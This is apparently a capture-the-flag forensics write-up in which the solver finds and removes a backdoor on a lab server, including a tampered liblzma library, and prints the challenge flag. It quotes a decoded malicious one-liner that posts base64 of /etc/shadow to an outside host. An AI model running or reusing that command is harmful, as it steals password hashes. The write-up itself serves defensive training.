Mitigation
Challenge
- CTF: HTB Business CTF 2024: The Vault of Hope
- Name: Mitigation
- Category: Forensics
- Difficulty: Medium
- Points: 500
- Description: Having now gathered all the intelligence, you are now making the final preparations to attack the vault! You connect back to your server to review some important evidence one last time! However, as soon as you connect you discover things are in complete disorder. You check the root directory and you find
/root/backdoor.log, clearly evidence of an active backdoor, set in place to hinder your assault on the Vault! Eliminate the backdoor in order to continue with your plans!- Note: A new line is added in the logfile approx every minute indicating the status of the backdoor
- Note 2: Connect to the server using SSH and
root:tooras credentials - Note 3: You need to be connected to the CTF VPN in order to reach the server
Writeup
sshpass -p 'toor' ssh [email protected]
Linux e5d2ef9f9174 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@e5d2ef9f9174:~#
Run linpeas.sh …
sshpass -p 'toor' scp /var/www/html/linpeas.sh [email protected]:/tmp/
File in /tmp called .c contains private key?
-rw-r--r-- 1 root root 152 May 20 00:09 /tmp/.c
root@e5d2ef9f9174:~# cat /tmp/.c
Y3VybCAtWCBQT1NUIC1kICJkYXRhPSQoYmFzZTY0IC9ldGM
vc2hhZG93KSZpPSQoaG9zdG5hbWUgLUkgfCBhd2sgJ3twcm
ludCAkMX0nKSIgaHR0cHM6Ly92YXVsdC5odGIvaGFzaGVzL
3NhdmU=
curl -X POST -d "data=$(base64 /etc/shadow)&i=$(hostname -I | awk '{print $1}')" https://vault.htb/hashes/save
2024/05/20 00:13:40 CMD: UID=0 PID=7103 | sh -c echo ludCAkMX0nKSIgaHR0cHM6Ly92YXVsdC5odGIvaGFzaGVzL >> /tmp/.c
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
root@e5d2ef9f9174:/etc/ssh# find . -ls
396815 8 drwxr-xr-x 1 root root 4096 May 16 14:01 .
51937 4 -rw------- 1 root root 513 May 16 13:59 ./ssh_host_ecdsa_key
51939 4 -rw------- 1 root root 411 May 16 13:59 ./ssh_host_ed25519_key
35690 564 -rw-r--r-- 1 root root 573928 Dec 19 14:51 ./moduli
51936 4 -rw-r--r-- 1 root root 574 May 16 13:59 ./ssh_host_rsa_key.pub
35664 4 drwxr-xr-x 2 root root 4096 Dec 19 14:51 ./ssh_config.d
35692 4 drwxr-xr-x 2 root root 4096 Dec 19 14:51 ./sshd_config.d
51942 4 -rw-r--r-- 1 root root 102 May 16 13:59 ./ssh_host_ed25519_key.pub
51938 4 -rw-r--r-- 1 root root 182 May 16 13:59 ./ssh_host_ecdsa_key.pub
35662 4 -rw-r--r-- 1 root root 1650 Dec 19 14:51 ./ssh_config
396823 4 -rw-r--r-- 1 root root 3228 May 16 14:01 ./sshd_config
51935 4 -rw------- 1 root root 2610 May 16 13:59 ./ssh_host_rsa_key
root@e5d2ef9f9174:~# rm /tmp/.c
Find Rootkits
wget ftp://ftp.chkrootkit.org/pub/seg/pac/chkrootkit-m.zip
unzip chkrootkit-m.zip
sshpass -p 'toor' scp ./chkrootkit-m/* [email protected]:/tmp/
Install dependencies:
apt install net-tools make binutils zip systemctl vim unar build-essential debsums
Update SSH SErver (Port 22 -> 2222)
root@e5d2ef9f9174:/tmp# service ssh restart
Restarting OpenBSD Secure Shell server: sshd.
Hidden Files/Dir:
find / -type f -name ".*" -ls
find / -type f -name ".*" -ls
root@e5d2ef9f9174:/tmp/chkrootkit-0.58b# debsums --all --silent
debsums: changed file /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 (from liblzma5:amd64 package)
rm /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
cat test.b64 | base64 -d > /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
md5sum /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
90764eaae5baa3e93c789e4692968b4a /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
Broadcast message from root@e5d2ef9f9174 (somewhere) (Mon May 20 00:56:47 2024)
Backdoor eliminated! Check /
root@e5d2ef9f9174:/tmp/chkrootkit-0.58b# cat /flag.txt
HTB{oH_xZ_w3_f0uNd_tH3_b4cKd0or}
Flag: HTB{oH_xZ_w3_f0uNd_tH3_b4cKd0or}